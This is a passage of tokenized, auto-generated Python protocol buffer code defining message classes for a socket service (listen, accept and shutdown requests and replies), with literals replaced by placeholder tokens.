<EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ListenRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_backlog_ = <NUM_LIT:0> <EOL> backlog_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def backlog ( self ) : return self . backlog_ <EOL> def set_backlog ( self , x ) : <EOL> self . has_backlog_ = <NUM_LIT:1> <EOL> self . backlog_ = x <EOL> def clear_backlog ( self ) : <EOL> if self . has_backlog_ : <EOL> self . has_backlog_ = <NUM_LIT:0> <EOL> self . backlog_ = <NUM_LIT:0> <EOL> def has_backlog ( self ) : return self . has_backlog_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_backlog ( ) ) : self . set_backlog ( x . 
backlog ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_backlog_ != x . has_backlog_ : return <NUM_LIT:0> <EOL> if self . has_backlog_ and self . backlog_ != x . backlog_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_backlog_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . backlog_ ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_backlog_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . backlog_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_backlog ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . backlog_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_backlog_ ) : <EOL> out . 
putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . backlog_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_backlog ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_backlog_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . backlog_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kbacklog = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ListenReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . 
MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AcceptRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . 
has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . 
has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> ktimeout_seconds = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AcceptReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_new_socket_descriptor_ = <NUM_LIT:0> <EOL> new_socket_descriptor_ = "<STR_LIT>" <EOL> has_remote_address_ = <NUM_LIT:0> <EOL> remote_address_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def new_socket_descriptor ( self ) : return self . new_socket_descriptor_ <EOL> def set_new_socket_descriptor ( self , x ) : <EOL> self . has_new_socket_descriptor_ = <NUM_LIT:1> <EOL> self . new_socket_descriptor_ = x <EOL> def clear_new_socket_descriptor ( self ) : <EOL> if self . has_new_socket_descriptor_ : <EOL> self . has_new_socket_descriptor_ = <NUM_LIT:0> <EOL> self . new_socket_descriptor_ = "<STR_LIT>" <EOL> def has_new_socket_descriptor ( self ) : return self . has_new_socket_descriptor_ <EOL> def remote_address ( self ) : <EOL> if self . remote_address_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . remote_address_ is None : self . remote_address_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . remote_address_ <EOL> def mutable_remote_address ( self ) : self . 
has_remote_address_ = <NUM_LIT:1> ; return self . remote_address ( ) <EOL> def clear_remote_address ( self ) : <EOL> if self . has_remote_address_ : <EOL> self . has_remote_address_ = <NUM_LIT:0> ; <EOL> if self . remote_address_ is not None : self . remote_address_ . Clear ( ) <EOL> def has_remote_address ( self ) : return self . has_remote_address_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_new_socket_descriptor ( ) ) : self . set_new_socket_descriptor ( x . new_socket_descriptor ( ) ) <EOL> if ( x . has_remote_address ( ) ) : self . mutable_remote_address ( ) . MergeFrom ( x . remote_address ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_new_socket_descriptor_ != x . has_new_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_new_socket_descriptor_ and self . new_socket_descriptor_ != x . new_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_remote_address_ != x . has_remote_address_ : return <NUM_LIT:0> <EOL> if self . has_remote_address_ and self . remote_address_ != x . remote_address_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_remote_address_ and not self . remote_address_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . new_socket_descriptor_ ) ) <EOL> if ( self . has_remote_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_address_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . new_socket_descriptor_ ) ) <EOL> if ( self . has_remote_address_ ) : n += <NUM_LIT:1> + self . 
lengthString ( self . remote_address_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_new_socket_descriptor ( ) <EOL> self . clear_remote_address ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_new_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . new_socket_descriptor_ ) <EOL> if ( self . has_remote_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_address_ . ByteSize ( ) ) <EOL> self . remote_address_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_new_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . new_socket_descriptor_ ) <EOL> if ( self . has_remote_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_address_ . ByteSizePartial ( ) ) <EOL> self . remote_address_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> self . set_new_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_address ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_new_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . new_socket_descriptor_ ) ) <EOL> if self . has_remote_address_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_address_ . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> knew_socket_descriptor = <NUM_LIT:2> <EOL> kremote_address = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ShutDownRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_SHUT_RD = <NUM_LIT:1> <EOL> SOCKET_SHUT_WR = <NUM_LIT:2> <EOL> SOCKET_SHUT_RDWR = <NUM_LIT:3> <EOL> _How_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def How_Name ( cls , x ) : return cls . _How_NAMES . get ( x , "<STR_LIT>" ) <EOL> How_Name = classmethod ( How_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_how_ = <NUM_LIT:0> <EOL> how_ = <NUM_LIT:0> <EOL> has_send_offset_ = <NUM_LIT:0> <EOL> send_offset_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . 
has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def how ( self ) : return self . how_ <EOL> def set_how ( self , x ) : <EOL> self . has_how_ = <NUM_LIT:1> <EOL> self . how_ = x <EOL> def clear_how ( self ) : <EOL> if self . has_how_ : <EOL> self . has_how_ = <NUM_LIT:0> <EOL> self . how_ = <NUM_LIT:0> <EOL> def has_how ( self ) : return self . has_how_ <EOL> def send_offset ( self ) : return self . send_offset_ <EOL> def set_send_offset ( self , x ) : <EOL> self . has_send_offset_ = <NUM_LIT:1> <EOL> self . send_offset_ = x <EOL> def clear_send_offset ( self ) : <EOL> if self . has_send_offset_ : <EOL> self . has_send_offset_ = <NUM_LIT:0> <EOL> self . send_offset_ = <NUM_LIT:0> <EOL> def has_send_offset ( self ) : return self . has_send_offset_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_how ( ) ) : self . set_how ( x . how ( ) ) <EOL> if ( x . has_send_offset ( ) ) : self . set_send_offset ( x . send_offset ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_how_ != x . has_how_ : return <NUM_LIT:0> <EOL> if self . has_how_ and self . how_ != x . how_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ != x . has_send_offset_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ and self . send_offset_ != x . send_offset_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . 
has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_how_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_send_offset_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . how_ ) <EOL> n += self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_how_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . how_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_how ( ) <EOL> self . clear_send_offset ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . how_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_how_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . how_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . 
send_offset_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_how ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_send_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_how_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . how_ ) ) <EOL> if self . has_send_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . send_offset_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> khow = <NUM_LIT:2> <EOL> ksend_offset = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ShutDownReply ( ProtocolBuffer . 
